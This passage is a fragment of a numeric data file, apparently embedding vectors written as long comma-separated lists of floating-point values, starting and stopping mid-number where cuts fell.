2873642,-0.012518989,0.016964596,0.008856019,0.0031490119,0.004054956,0.001964327,-0.02207187,-0.05445437,-0.0016008248,0.005807076,-0.021643117,0.01465798,0.012264267,0.0018760733,0.028784765,-0.0056716204,0.009006883,-0.015047226,0.010492837,0.016901439,-0.0024804494,0.0042723874,0.017061105,0.03136908,-0.014037412,0.0026437163,-0.0018204137,-0.017388722,-0.013965086,-0.015671246,0.0027976236,-0.023872565,-0.008540887,-0.01485564,0.008795617,-0.007885379,0.008078527,0.06449215,-0.014755144,-0.0017995196,0.00160358,-0.021353874,-0.0007418247,-0.015199033,-0.0079725785,-0.011758416,0.0226488,-0.0068237674,0.007695115,0.011246401,-0.031519677,0.020339854,-0.021269742,0.036951788,0.0070206975,0.028117493,-0.0023130463,-0.02699296,0.028380157,0.0113030765,0.0037812395,0.018485641,-0.0050450736,0.017387114,-0.013120973,0.004329721,-0.014862399,0.0076956656,0.012098102,0.021853546,-0.029117301,-0.004266352,-0.009426451,0.008058751,0.0014574578,0.0034884792,-0.0036952666,0.0183058,-0.024848431,0.0071827583,-0.00922557,-0.008098451,-0.023591,0.016636446,0.012959104,-0.014727015,-0.027744386,0.0061270054,0.02579487,-0.015704146,0.006673038,0.0026763876,0.010313422,-0.012871554,0.01726964,-0.005925893,-0.010096027,0.011390729,0.0055521345,-0.0015489053,-0.014185517,0.014735145,0.026470695,0.019497689,-0.031526405,-0.0017348317,0.013906777,0.007465015,-0.0013125922,0.025700435,-0.018142655,-0.006315964,-0.008337362,0.021656193,0.008863632,-0.027194165,-0.017532032,-0.008614242,0.030455036,-0.028826024,0.004588689,0.014992608,0.0023531278,0.022206474,-0.010039587,-0.03136268,0.016180826,-0.008506702,-0.011789823,0.00261852,-0.013223718,-0.009874621,-0.00827098,-0.00783322,-0.004761114,-0.007943344,0.0067902,-0.008825104,0.0026892424,0.022823527,-0.015243878,-0.029176127,0.0017261789,0.0033305837,-0.00071496697,-0.006748083,-0.036520954,0.00012808418,-0.025173875,0.1112408,-0.01869356,-0.019691762,0.008168304,0.036198255,0.0151948,-0.012406188,0.013040553,-0.035290126,-0.0181319,0.0024414482,-0.04164315,0.008275724,-0.0010182229,-0.0115921935,-0.016203506,0.022573508,-0.0016221552,-0.008991585,0.012655932,-0.0061784596,-0.0131931715,0.012291388,0.015666084,-0.022043003,-0.0382232,-0.00018535965,-0.0064091464,-0.023961933,0.009255345,-0.010223983,-0.011865825,-0.0025052307,-0.032878898,-0.012206391,0.0007469956,0.000087955144,0.0002705994,-0.011030315,0.0038657212,0.020690668,0.010354897,-0.011115336,-0.011712469,-0.02181117,-0.0027343563,0.021209586,-0.0008473725,-0.0063353837,0.017611617,-0.001165808,0.016727513,-0.0025204076,0.024773581,-0.0034348946,0.01509697,-0.004419244,-0.009210424,0.008192691,0.02055531,-0.004582951,-0.010180943,-0.015374164,-0.009174391,0.01868826,0.017896796,-0.013943078,-0.005636715,-0.015403009,0.00555355,-0.02527848,0.026917327,-0.0067886366,0.004680168,-0.0006094268,-0.010086102,0.0075389408,-0.010930397,0.017356085,0.0029930833,0.004221592,0.043436095,-0.020653524,-0.005252284,0.009113773,0.009503643,-0.020974047,-0.009091816,-0.0020452489,0.010895501,0.022195566,0.010824795,-0.020402567,-0.008777209,-0.0067489524,-0.0024253055,0.0035463108,-0.0073910817,0.011077738,-0.023857662,0.0031175727,-0.00617663,-0.0005150275,0.0013615025,0.008150156,0.00632231,-0.12838034,0.025731204,-0.006648342,-0.018065715,-0.009965389,-0.009046042,0.028010355,0.056226317,-0.0038657999,-0.059658483,0.0019243011,0.022447228,0.012647792,-0.006039535,0.00043308453,0.003952854,0.014186546,-0.0051249587,0.0015500559,0.013821942,0.002707805,0.0076640984,0.003839638,-0.0032734459,-0.000080999256,0.022582432,0.0012689971,0.0070137414,0.016780505,0.016157664,-0.014669137,0.007893229,0.0057568173,0.021873564,-0.0022346785,0.003578432,0.024155473,0.00454839,0.016203446,-0.0017016812,0.015936302,-0.008093948,0.00030684835,0.016094146,0.022489652,0.018653594,0.018149702,0.010361493,-0.005473131,-0.0000926737,-0.009153407,-0.010167105,0.013689276,-0.005245488,-0.015474172,-0.0205437,-0.021646205,0.015911952,0.013372493,-0.0067438544,-0.015128093,0.01252048,0.0043746424,-0.0023816233,0.008802684,0.0009280872,-0.0019385994,0.0034644497,-0.024121795,0.012965032,-0.007399533,-0.0013167738,0.00089261436,-0.0016807518,-0.004374334,0.0066812662,0.01754752,-0.0062123574,0.00072010397,0.02045023,-0.027161453,-0.0070390794,-0.014835035,0.010415661,0.007321056,0.0115693025,-0.019799786,-0.0004553278,-0.0106132245,-0.0063154357,0.011723003,-0.002771775,-0.0067792516,-0.009738352,-0.01195191,0.023531202,-0.008893925,0.027388519,0.0021854357,0.014594939,0.0024358442,0.012629078,-0.015963078,-0.015939234,-0.083896525,-0.0034640362,0.04229646,-0.0054513053,-0.012020229,-0.017893389,0.020055208,0.0058940253,0.030657548,0.005443558,-0.020839835,0.0076585175,0.00039721036,0.0024447127,-0.0047958307,0.013885525,-0.046255585,-0.0045862766,-0.0008248022,0.009537917,-0.016072733,-0.007264392,-0.03166437,0.0036238187,0.006608995,-0.021092946,-0.0075112344,0.042106733,0.008918393,-0.02210743,-0.0018325193,-0.002749907,-0.0128489435,-0.0030845301,-0.035594475,-0.019612134,-0.0022378373,-0.0019666352,-0.005492053,0.015921328,0.009671799,-0.020006102,0.021693762,-0.005742019,0.0013184715,-0.004082383,0.0018598147,0.005728359,0.00075470895,0.01015479,-0.004625432,0.0024373094,0.014647895,0.007426348,-0.0069559766,-0.029178286,-0.012588616,-0.004431177,-0.0057522743,0.025465155,-0.027334128,0.014797124,-0.0059725572,0.025255922,0.0034582731,0.014241461,0.0073974407,-0.004640506,0.012632849,-0.008114894,-0.010037084,0.002636646,0.03300154,-0.00091554236,0.03176083,0.015764577,0.000032477234,-0.0017913743,0.012585297,-0.0042056222,0.008314682,-0.022563979,0.0076361718,0.017862055,-0.023637477,-0.0016916331,0.005100119,0.0033645038,-0.015550814,0.017120294,0.010771695,0.020693999,-0.015422987,-0.006425532,0.023185771,0.014693903,0.041040406,0.019234639,-0.0063277404,0.003266488,-0.021755015,-0.00090439303,-0.01589581,0.0044325534,-0.024407282,0.012182318,-0.0032493686,-0.017015418,-0.013406742,0.0011630361,0.009704556,0.0033859832,-0.019822698,-0.00011284867,-0.019604169,-0.007569735,-0.008448932,-0.010613514,-0.014021315,0.0053782943,-0.019003622,0.009087121,0.004595694,-0.021598328,-0.023825267,0.0013866035,-0.0017075794,0.021524347,0.012725119,-0.0007723163,0.0034222351,-0.0070172646,0.025831217,-0.028353512,-0.008239253,0.0073875193,0.009787214,-0.0026509324,0.0051504606,0.0068332125,0.0066428105,-0.015092433,0.015280581,0.0012211086,-0.0015132239,-0.015766948,-0.001829143,0.01586015,-0.018316569,0.011396557,-0.01260166,0.014160519,0.009029683,0.008796212,-0.030062983,0.0072680074,-0.036289208,0.005024268,0.013231649,0.0027984364,-0.007945752,-0.00044522184,-0.0016518269,0.0058553345,-0.0031847444,-0.012488555,0.0040799305,-0.008194178,-0.010229029,-0.0028285065,0.0031305857,0.0027115461,0.0011211461,-0.04572551,0.021675367,0.024542907,0.034085914,0.04738411,0.01577266,0.014490937,0.0077243964,-0.0071231397,-0.01096898,-0.0028960824,0.0154405525,0.010461459,0.019125126,0.0025412992,-0.0034977207,0.00504908,0.014691244,-0.008082323,-0.01765727,-0.0072323843,0.027265364,-0.0076664253,-0.002462778,0.004060384,0.01310408,-0.0055528646,0.010892042,0.033980366,0.018143112,-0.020968432,-0.00194009,-0.0038156412,0.0036526313,0.025623275,0.0261435,0.010611407,-0.011592494,0.00159935,0.003650875,0.001181141,0.017767902,0.01775109,-0.011749913,-0.015215805,0.047049537,0.020355068,-0.0047062263,-0.001613954,0.005646742,-0.0061287116,0.027846567,0.022711849,0.032302793,-0.004984686,-0.00034602775,-0.019342752,0.00062025076,0.009877487,-0.022018146,0.017319014,0.015673725,0.01018431,0.018400474,-0.0059570847,-0.014437438,0.001612599,0.008231609,0.026619576,0.019678056,0.0143578965,0.00027747682,-0.005005794,0.017828286,0.0068651144,-0.014627623,0.009446649,0.022608954,-0.006702739,0.0010154172,0.006485542,-0.017349536,-0.013378902,0.018666372,-0.008760336,0.0026923048,0.0023400527,0.00026369552,-0.0058468212,-0.026859626,0.0056622787,-0.0063742744,-0.014521669,0.016502107,-0.01517327,0.008074986,0.004088031,0.014777936,0.010121562,0.003509145,0.02332378,0.025982434,-0.009443847,-0.03476566,0.0003986765,0.019038625,-0.0076638497,-0.0016088291,-0.015809838,-0.014662831,0.018613383,-0.0036960181,0.014526829,-0.010229647,-0.0038004988,-0.021136833,0.004488848,0.010814686,-0.008735769,0.00798513,-0.0069397553,-0.015111775,0.01662105,0.0213414,-0.008693055,0.0056038466,-0.010706167,0.00898195,-0.010693631,0.010132794,0.014789451,-0.0048752315,-0.022375436,-0.0042084325,0.02368442,-0.012766302,-0.0056075943,-0.005360565,0.014049142,-0.01861821,0.01132578,0.003419343,0.013413554,-0.008992585,0.010862318,-0.01180328,-0.006665671,-0.006780098,-0.020788288,0.035296638,-0.0118850665,0.020258352,0.023887128,-0.00036356275,0.008190666,-0.025584131,0.0026632086,0.018163633,0.029423783,-0.006537059,-0.008466729,0.007856772,-0.012687874,0.00084359274,0.008017328,0.011765204,0.018224195,0.008389539,0.0005766151,0.0046091164,-0.022220133,0.0054043685,-0.0001053312,0.021813888,-0.0073659862,0.02761386,0.005835418,-0.0050169304,-0.009641156,-0.008215081,0.019103482,0.006672312,0.004925165,0.00020398668,-0.0002059296,0.013394875,0.018616773,-0.04048215,0.011978747,-0.017381437,0.011106355,-0.0053425953,-0.017662685,-0.012562792,0.014863985,-0.012210198,-0.0058142263,-0.0039328854,0.009263423,-0.021280678,-0.01985497,-0.014150314,-0.08923503,-0.0010019018,0.010021007,-0.018643094,0.04012543,0.007719532,-0.00018657524,-0.001543122,-0.0064564114,0.014091297,-0.008011715,-0.00018918648,0.0015947941,0.024044983,0.020568196,0.012670106,0.0052690175,0.021461736,0.023912843,-0.0075438265,0.0024979664,0.029746309,-0.0055449097,0.014020399,0.0049960865,-0.008903211,-0.009779516,-0.0066585755,-0.012621279,0.014131855,0.01419027,0.0066010174,0.016539413,-0.014332589,-0.0073581757,0.0027828407,0.0012876021,-0.004587682,0.003854279,-0.03579512,0.0044668913,0.010396394,0.0069671287,-0.006548964,0.00063133426,0.033429842,-0.039769772,-0.023999043,-0.026875632,-0.010496133,0.007060815,0.006839535,-0.00038656453,0.009806002,-0.0043539,0.011399412,0.015683666,-0.008723529,0.01739245,0.0037444336,-0.019650815,-0.005540438,0.031140106,-0.012598168,0.016009077,0.021717874,-0.009722488,0.009678035,-0.029531421,0.012468126,0.005407164,-0.026876539,-0.03092212,0.007230841,-0.021416288,0.016715463,-0.007837559,-0.0013352331,0.01788836,0.013629699,0.012742671,0.0025659823,0.00074587495,-0.0066015236,0.007029147,0.00041288242,-0.01780526,0.007066901,0.030831413,-0.002486801,0.005364154,-0.0018630468,0.028939357,-0.0053507877,0.004069028,0.014726246,-0.0026055563,0.0043707606,0.018536756,0.009111877,-0.009544185,0.0154726235,0.014743171,-0.015191217,-0.00981721,-0.010677976,-0.012616233,0.0045394828,-0.000017398057,0.004946041,-0.008233859,0.012109218,0.023511447,0.026791485,0.011271863,0.01648021,0.008544945,0.006844061,-0.015167924,-0.01547542,-0.005132692,-0.01900043,-0.02311992,0.0027319395,0.00325059,0.0021847796,-0.010051663,-0.018196218,-0.007185313,0.005166102,-0.010928956,0.028870476,0.024710987,0.012985941,-0.00455931,0.015126231,-0.00929177,0.0112434365,-0.018107971,0.01857727,-0.0074385116,-0.030838342,0.008996773,0.007619244,-0.010973305,0.027641958,-0.0136446105,-0.00379245,0.0023816992,-0.0028039995,-0.012591011,0.010715557,0.002451196,0.009871226,-0.00085916085,0.0016191899,0.009518939,0.008611872,0.019849176,-0.01001939,0.00414759,0.0056778416,0.02497495,0.009856748,-0.015887892,-0.0064152563,0.0065849167,-0.004467613,-0.0073590516,-0.013628417,-0.015827317,0.0013792797,-0.0024420882,-0.0061597377,-0.016663501,-0.0018618283,0.025113449,0.008020242,0.0041076047,-0.021868909,0.000544644,-0.010035754,0.0000720466,-0.0074678906,-0.021968102,-0.0022408492,-0.009794523,-0.0060448134,0.0056453277,-0.028828477,-0.00637383,-0.0032561864,0.0013831467,0.00043199988,-0.026790181,-0.026571436,0.0033628503,0.007856083,-0.025051156,0.015786184,-0.01565048,0.006683914,-0.003217918,0.011161461,0.019958708,0.024815466,0.007907015,-0.0044868756,-0.016061299,0.005873071,0.004411738,0.015101004,0.013111063,0.11462985,0.031141192,-0.023319352,0.015198678,0.0005808109,-0.004452676,0.023568278,0.009463413,0.015915325,0.0063171773,0.011225901,-0.0099034775,0.014153174,0.0041976226,-0.014943533,0.018711518,0.0078249285,-0.01307347,0.006328357,0.0021278039,0.016586244,-0.022090562,-0.009025582,-0.0036997935,0.014882636,-0.049605615,0.007618293,0.029692538,-0.00069642346,0.024394132,0.026317978,0.022767426,0.03453429,-0.0037372273,-0.016596492,-0.0060739797,0.012920451,0.0014367526,-0.0013094903,-0.008460386,0.0035418787,0.0216532,0.009916437,-0.0037786535,-0.031542327,0.0025135598,0.00032552163,-0.015958447,-0.015309705,-0.022314282,0.01038677,0.017793205,0.0061194403,-0.0059925844,0.011330907,-0.0010600362,0.0019374132,0.0031083177,0.011765192,0.0018939722,0.032993637,-0.0077757128,-0.0009161848,0.014144433,0.006882149,-0.01361082,-0.012142156,-0.015584695,-0.015154127,-0.03751062,0.044483684,-0.015835576,0.0068793157,0.009990172,-0.012419574,0.028265039,-0.0067989407,-0.039853375,-0.0116116805,-0.00034050946,0.0050296113,-0.0007668541,0.024960713,-0.0084540285,0.021845857,-0.0006042552,0.0129706,0.00011178285,-0.00050785975,-0.004555988,-0.0038868238,0.02373372,0.0002887149,-0.0072487127,-0.015295576,-0.005576207,0.017092716,-0.009585327,0.002036114,-0.0014002325,0.0047192154,-0.0013802599,-0.0127379615,-0.0018640202,-0.009105207,-0.0006767874,0.012384499,0.02325573,0.000103030325,-0.013279963,-0.003673039,0.014587523,0.0063427915,0.015771918,-0.0058862735,0.004448964,-0.011261172,-0.024733337,0.008310303,-0.014163336,0.0046091927,0.002658297,0.030910589,0.030843614,0.01543194,0.020216912,-0.02182871,0.0012948986,0.002233058,-0.008081335,0.013889103,-0.037066,-0.020721653,0.0137436995,0.0006875227,0.016422123,0.013753444,0.006921523,-0.0014036729,0.0070114657,0.007977918,-0.001371183,-0.0075931936,-0.015194047,0.014553574,0.0008089399,0.023014696,0.01916598,0.017361736,-0.0100703705,-0.011361077,0.011633902,-0.011332748,-0.005713013,-0.01003627,-0.019248832,0.0007821344,0.005853686,-0.01156973,0.0076884166,-0.0008836689,0.008286911,0.014232971,-0.039041597,0.02599866,0.013269948,-0.0073960815,-0.009514949,0.00007175812,0.005458663,0.0024374886,-0.006597075,-0.005405906,0.01980629,-0.014205204,-0.0138408085,0.011152369,0.0117797265,-0.016957814,0.00205994,0.028934376,0.00981939,-0.005823112,0.024659744,0.022072043,-0.006591448,0.0033851678,-0.004732041,-0.007817964,0.03573107,-0.013899195,0.02121609,0.0008529864,0.013158307,-0.0038491085,0.0137083875,-0.03059707,0.044270106,-0.02770168,-0.030631278,-0.018981773,0.0022562656,0.0017579952,0.0107661905,0.008565537,0.004269445,0.0007054232,-0.0096159,-0.0070612,-0.0010171308,0.021504598,-0.009463868,-0.0017027266,-0.02446268,-0.0058735046,0.0037277634,-0.014165995,-0.015621574,-0.026772542,0.0073476443,0.011678381,-0.03645511,0.0033989798,0.0063804034,0.0020633528,-0.029483592,-0.016022388,0.006815584,0.00353989,-0.018782893,0.0009088721,-0.0018040354,-0.014760281,-0.000046697718,0.00058527477,-0.00254267,0.00928718,0.028812606,0.007385075,0.0075479336,-0.0038677251,-0.009671372,0.00464988,-0.00017077773,-0.029208107,-0.012936124,0.019616658,-0.033684444,-0.014330247,-0.020664953,-0.02502577,0.013874253,-0.018298613,-0.012031485,-0.016694749,-0.018352682,-0.016032599,0.01761122,0.010868623,-0.009219865,-0.011980235,0.008170995,0.009879906,-0.0028723394,0.00018842639,0.0035933692,0.016186604,-0.031302817,0.007029241,-0.0038032753,0.0005740467,-0.015208372,-0.0108131,-0.006023561,-0.015457275,0.011157851,0.00096586766,0.012778351,-0.01735835,0.012294043,0.010298568,-0.020969814,0.020693712,-0.021109287,0.011790566,-0.009493742,0.006199705,0.0122066075,0.04059808,-0.080792546,-0.007244413,0.03624092,-0.0051339515,-0.015730342,0.027698372,-0.024228444,-0.0640825,-0.03795515,0.036327165,-0.016112015,-0.003151101,-0.01889294,-0.002388258,0.011297685,-0.021565225,-0.0061236243,-0.00044855225,-0.005818539,-0.009345202,0.014325311,0.01300682,0.00018816264,-0.00045497675,-0.007950895,-0.024312932,-0.0134071745,0.011808155,0.0026303637,0.009810768,0.0072571733,0.0011765484,-0.028302124,-0.0066266577,-0.01419473,0.002927754,0.007912832,0.013615053,-0.009557729,-0.030278003,-0.028594693,0.009503152,-0.011055053,0.004477259,0.0014133621,-0.005194418,0.035534482,0.007991246,0.15454786,0.011757878,-0.0045080944,-0.011592868,0.0009776269,-0.02430161,-0.008141655,0.012333737,-0.009248959,0.013570925,0.0011324685,-0.01210228,-0.0044450364,0.009526087,-0.0034924732,-0.018639669,0.014494786,0.14807667,0.0032224806,0.010028508,0.019657897,0.0009703789,0.006768676,0.010876134,0.0018276233,-0.026683604,-0.0065558217,-0.022668235,0.013252715,-0.004937099,-0.03995882,0.008096583,0.012423085,-0.0070002987,0.0019106334,0.02170672,0.009210845,-0.023704676,-0.034028403,-0.015887905,0.008657326,-0.015400512,0.00020650342,-0.0033831915,0.012648928,0.01344261,-0.0066206455,-0.0010538893,0.010115,0.024969775,0.009738166,-0.0031064146,-0.003192785,0.0050993417,0.0018319078,0.022157764,-0.0027738658,0.014728151,-0.050195094,0.01849428,0.020660195,0.0124763865,-0.020105613,-0.0041861543,-0.027679604,-0.0027171904,-0.0046433047,-0.000017575494,-0.015384608,0.009332089,-0.0015446818,0.022288522,-0.023121601,0.004009483,0.021276407,0.0028977874,-0.01265222,-0.0007139826,0.011784079,-0.027259095,0.016237156,0.010955885,-0.019577354,-0.009762767,0.014051534,0.011531309,0.01676871,0.0026808644,-0.00022512434,0.011311656,-0.024844725,0.005670102,-0.013870231,-0.0070105223,-0.018635316,0.018111136,0.0037669395,0.006335748,-0.007184427,-0.02464164,-0.005718996,0.019135928,0.0026133915,0.018079413,-0.00030168876,-0.003598149,-0.027169993,-0.0045345207,-0.00726696,0.0025495095,0.02198064,0.008626978,0.00020086227,0.0017361934,-0.009590939,-0.006891454,0.011331235,0.013615557,-0.020311302,0.018647129,0.010739415,-0.014698677,0.016929995,0.004605135,-0.029466677,0.004051491,0.010174409,-0.0024886848,-0.04223679,0.006308887,-0.0051092114,-0.001390361,-0.0012324759,0.023222165,0.019828456,-0.010825184,-0.0058588106,-0.03134691,-0.001978872,0.0034219106,0.008068478,0.017887045,0.0071383324,0.0081408145,-0.009632734,-0.002462613,0.0023024206,-0.0041931206],[-0.0010461914,-0.015471847,-0.00902779,-0.011932891,0.0049557565,0.022481455,-0.000112736976,0.03432075,-0.01452948,0.014636937,0.00025045028,0.012478397,-0.0440288,-0.018123347,0.017008299,0.0009265563,-0.010488954,0.003214245,-0.0037340338,0.0071590533,0.0012357297,-0.0045153783,0.009142467,-0.014934661,0.010366972,0.023018746,-0.0034898296,-0.020297507,-0.011286524,-0.020484729,-0.006335328,-0.02078867,-0.009938774,0.02601398,-0.01588948,-0.0039531053,-0.011615129,0.024115648,0.008174343,-0.011242454,0.00976989,0.00047570234,0.019834304,0.006608114,0.0031951224,-0.0028361443,0.021772875,-0.006180513,0.013741048,0.0052079703,0.010919109,0.0057045575,-0.02751998,-0.003973929,0.0030585267,0.017960036,-0.0062644156,-0.0061974786,0.016586542,-0.019323224,-0.0044833035,0.017168023,0.026763963,-0.0011835736,-0.035091788,-0.030387204,-0.022982422,-0.0036489028,0.0021107374,-0.011779294,0.02320169,0.015880859,0.009994315,0.0136065595,-0.013841361,-0.0020565446,-0.004646206,-0.015405984,-0.021783693,-0.018219247,-0.024940362,0.0032469167,0.030560376,0.030515997,0.021813318,-0.0031315337,0.010001581,0.023938552,0.012660515,-0.024842277,-0.01471442,0.0010345969,-0.020669017,0.008500818,-0.0031448023,-0.019762658,0.016288392,0.007956077,0.034315906,0.01482378,0.0037110313,-0.02501989,-0.018904602,0.010172771,0.0023357433,-0.0010770122,0.0075487043,-0.01351986,0.009478619,-0.026688542,-0.016610984,-0.011630111,0.014882641,0.0005900037,-0.015412734,-0.02502901,-0.0007533674,0.0040478203,-0.0027596527,-0.004614838,-0.001700655,-0.011894067,-0.0059928363,-0.008071713,-0.03448238,0.015926704,-0.016455755,-0.0010173752,-0.024039064,-0.016416214,-0.012396307,-0.0031238343,-0.013564344,0.0059529333,-0.0077066724,0.0049642627,-0.007007008,-0.008268592,0.016908031,-0.033574298,0.011872808,0.0131322555,0.01831323,0.0093595125,-0.042244002,0.02803018,0.010298824,0.027823137,0.030940047,0.012543014,0.007275783,-0.013906632,-0.015028726,-0.0053081196,0.000046303623,0.018340867,-0.006378839,0.0034332199,-0.0067965295,0.0013037163,-0.008289784,0.019932734,-0.004098197,0.014678206,-0.020252675,-0.006528563,-0.007736712,-0.008455572,0.007266604,-0.0033413782,0.017878892,-0.0051898826,0.0004725078,-0.001548731,0.010434699,-0.035068627,0.04414858,-0.008293554,-0.002726631,0.014825896,-0.014656078,0.032117754,-0.0069601657,-0.016023546,0.036252506,0.013624429,0.034278363,-0.015128157,-0.010358487,-0.008497027,0.003565299,-0.008215059,-0.0037167564,-0.0076898267,0.01962145,-0.014454547,-0.0044637364,0.06341099,-0.036872398,-0.0039287987,0.0087088095,-0.007818399,0.029408464,-0.015891673,-0.011986217,0.017812604,-0.020948725,-0.023498157,0.0002346815,-0.012335606,0.0066003916,-0.011821048,0.015558077,-0.00092048274,0.003762378,-0.0754607,0.0093434155,0.015526591,0.019675214,0.040730957,0.008988585,-0.017512115,-0.018734077,-0.0017513133,-0.02762716,-0.010288284,0.033105236,-0.014920209,-0.0146896625,-0.00012442326,0.0145841595,0.012434034,-0.013031549,0.0023619463,0.0043020095,-0.010436796,-0.0011998893,-0.009895916,-0.021394856,-0.0065202434,-0.024944248,0.00031897475,0.011285851,-0.014052627,0.011294416,-0.01467271,-0.011777704,0.025000012,0.004484053,-0.009989974,-0.0014873025,-0.009118449,-0.013106941,0.01905657,-0.0014885904,-0.012700124,0.018213276,-0.004833284,-0.008248532,0.010130523,-0.0029044515,0.023009466,-0.012660378,0.025877314,0.030423546,-0.00070550316,0.020218926,-0.015694855,0.00992595,-0.009028387,-0.0062589142,-0.008895313,0.001613046,0.001552025,0.024265679,0.0025846749,-0.013807728,-0.026093343,0.008863256,0.0012450616,-0.0007503471,0.008938174,-0.027144386,-0.008328445,0.0035005116,-0.008009511,0.008743869,0.021919936,-0.0034325894,0.008490554,-0.0017005664,0.009358459,0.007487492,0.0022475454,-0.00034079075,-0.023589808,0.004327691,-0.0007672287,0.014835645,0.008274158,0.027754748,-0.012913975,0.017836392,0.0068097096,-0.012310949,0.0009735692,0.0037387433,0.060376115,-0.006735669,-0.001071227,0.0011875808,-0.040471435,0.038328912,-0.011160786,0.01535632,0.028493984,-0.0006535691,-0.023845136,0.013400795,0.011845958,-0.0073109176,0.02000509,-0.019038402,-0.0044654016,0.013313688,-0.0043558967,0.009506431,0.003440008,-0.025533333,0.017683728,0.011259283,0.0011434333,0.011057586,0.021314897,-0.0054797195,0.0071221055,-0.002781873,0.019160824,0.0094931265,0.033690106,-0.00070310134,0.016236205,0.009333626,0.021918064,-0.016845714,-0.010688505,-0.015810752,0.0081948545,0.0058895987,0.037098583,0.03515015,-0.000659807,-0.007616139,0.010643129,0.0015165132,-0.0050487528,0.009974923,-0.029097302,0.0035222215,0.008333633,-0.00786984,-0.046909787,0.021796437,0.009825934,0.03877958,0.019663565,0.003452494,-0.014172577,0.016685352,-0.01227967,0.009083028,-0.002044938,-0.01805186,-0.01749031,0.006307299,-0.016143432,-0.0043179775,0.094701104,0.0009125254,0.014390738,-0.025330206,-0.005064816,-0.0060854927,-0.040246293,0.017894346,0.003008228,-0.035538115,0.015161357,0.017812172,0.0135006495,0.019240037,-0.0017370654,0.0018914076,-0.008963317,-0.03528168,-0.0066327746,-0.003313466,-0.006360274,-0.012792436,0.020113247,-0.013389165,0.00441958,0.008923242,0.01798096,0.0070780423,-0.005787316,0.0011738586,-0.0015246716,-0.0035689771,0.022609677,0.031329166,-0.022797788,-0.01934576,0.0024180748,-0.009873726,0.005801532,-0.0036150326,0.021546515,-0.00058518146,0.011189336,0.0027808377,-0.0044316887,0.0014975122,-0.002072962,0.012637023,0.0041655973,-0.012063762,-0.0017602047,-0.020326704,0.027874826,-0.009944537,0.0019176134,-0.0010455088,0.010936452,-0.00996188,0.045644697,-0.0026363998,-0.0030104122,-0.018887263,0.004242365,0.022904187,-0.029944984,0.004733508,0.04891029,0.020581624,0.02727409,0.017611468,0.0129034,0.005989942,0.0010103523,-0.0005651852,0.020639515,0.007957137,0.015253307,0.011703145,0.026679201,0.015020291,-0.039174434,0.011803339,-0.053684786,0.007103936,-0.0040437486,0.0036145996,-0.01780658,-0.0044233464,0.015169163,0.0017311098,-0.00644805,-0.00046403983,-0.0060605113,-0.032328475,-0.010431129,-0.008393245,0.008155267,-0.03686511,0.0015029515,-0.020469662,-0.0072942185,0.013293613,-0.010416445,0.006979153,-0.0120050935,-0.020335872,0.009979183,0.03894559,-0.0019096319,-0.0018964487,-0.031489592,-0.033619195,-0.0015578296,0.0058032065,0.009346464,-0.007905099,0.013237544,0.0011398206,0.029901324,0.009611385,-0.027786803,-0.007839715,0.017114358,0.003552962,-0.033283345,0.012291094,0.028783556,-0.0011002778,-0.008553744,-0.0016065413,0.023335662,-0.0050657433,0.03237343,0.010998389,-0.020678895,0.011474911,0.005397554,0.0041976743,-0.024728788,0.0042492826,-0.00027646526,-0.001240346,0.007665195,-0.0034495422,-0.00351348,0.018583583,0.015460677,0.024434233,-0.00064193987,-0.000040416406,0.008025111,0.0171078,0.0019810733,-0.0003082097,0.034051295,-0.0014232469,-0.01164506,-0.0045115566,0.021322943,0.0131046325,0.025788069,0.012421302,0.026580185,0.018698778,0.0022581373,0.009546715,0.005074673,-0.004152039,-0.011413644,0.011334396,0.005727859,0.008313991,-0.0075973594,0.0024311368,-0.010254011,-0.017931812,0.022632224,-0.006459834,-0.0035966595,0.022797262,0.03356131,-0.00050578447,-0.0026611793,-0.01524503,-0.010760734,-0.0015120488,0.020131025,0.005048073,-0.0029575469,-0.007889904,-0.006505138,0.0015869978,0.009500446,-0.0019463871,0.01906639,0.0034792284,0.023628836,-0.0060022306,-0.0044914833,0.026785973,0.008586672,0.009458938,0.0032411036,-0.004611578,-0.034888282,0.013153209,-0.010511802,0.021091115,-0.011331666,-0.004215512,-0.011050268,0.005423921,-0.0098729655,0.019132473,0.007649402,0.007536155,-0.0108021395,-0.0546337,0.0012071008,-0.0009355038,-0.0077185365,-0.0048339,0.0016234989,-0.02261273,0.019003775,0.01223556,0.002908248,0.010859485,-0.009169299,0.011090499,-0.021272065,0.0129885115,0.002710546,-0.019539233,0.016110223,0.02162275,-0.023731591,-0.017559016,0.0044356342,-0.004911163,-0.015512821,0.010647178,0.023480667,-0.008846632,-0.01535948,0.011514245,-0.030991405,0.019012723,0.019016096,-0.014963406,0.013690341,0.004441969,0.022849139,0.018993353,-0.0076203523,-0.025442135,-0.010475599,0.03537372,0.007845716,-0.010018755,-0.005370249,-0.023690626,0.021626137,-0.01903169,-0.0068581984,-0.04291167,0.0066010347,0.020512467,-0.008299613,-0.027577227,0.04290266,-0.0044353763,0.030869165,0.0044486704,0.010883999,-0.022915404,-0.02009735,0.010344035,0.026817178,0.031080002,0.03501761,-0.0051087257,-0.026774812,0.002863372,-0.012889836,-0.0010175067,0.021571811,0.0062379725,-0.00016965841,0.002606101,0.017051993,-0.0038757466,0.005116181,0.0071433173,-0.009009338,-0.016712738,0.006133519,0.008052525,0.0009987077,0.051991347,-0.030235594,0.00066184386,0.0028250648,-0.0019536873,-0.0106694605,0.026466876,-0.0010482008,-0.013949082,-0.0078033474,0.02532768,-0.0030612685,-0.019122737,0.015469951,-0.004320036,0.050506633,-0.009972091,-0.003247606,0.0031166654,0.006101333,-0.01871119,0.008963022,-0.012373627,0.03224324,-0.0060645607,-0.017164424,-0.00720672,0.010272931,0.0029047611,-0.017628184,0.01202932,0.008738376,0.005070243,-0.008603688,0.010520342,0.0030030601,0.003109434,0.007646532,-0.008605589,-0.013270531,0.0228111,0.018255677,0.0015427566,0.0031637684,-0.005294021,0.015455532,-0.0013428594,-0.011246185,-0.0037121552,0.004566878,-0.003962828,-0.017784193,0.030134989,0.009719278,0.013421923,-0.02238876,-0.018668879,-0.013775471,-0.037200432,0.006566394,0.008282724,-0.024301108,-0.017946016,-0.033974912,-0.014085181,0.0060561155,0.0039277,-0.02278032,-0.025685016,0.00750543,-0.012189478,-0.0023286147,-0.012753881,-0.035073586,-0.0042220065,0.025065212,-0.02088212,0.012883542,0.004800628,-0.019774023,0.003975778,0.03763397,-0.00050576613,-0.010654767,0.0043953727,-0.0072071715,-0.0017940779,0.022925837,0.032927215,-0.025497412,0.0062320223,0.027175851,-0.016634367,-0.012548629,-0.0067981263,-0.005913608,-0.012733178,-0.0039230674,0.009589774,0.0067192824,0.009426203,-0.005933579,0.018747022,-0.032039046,-0.0088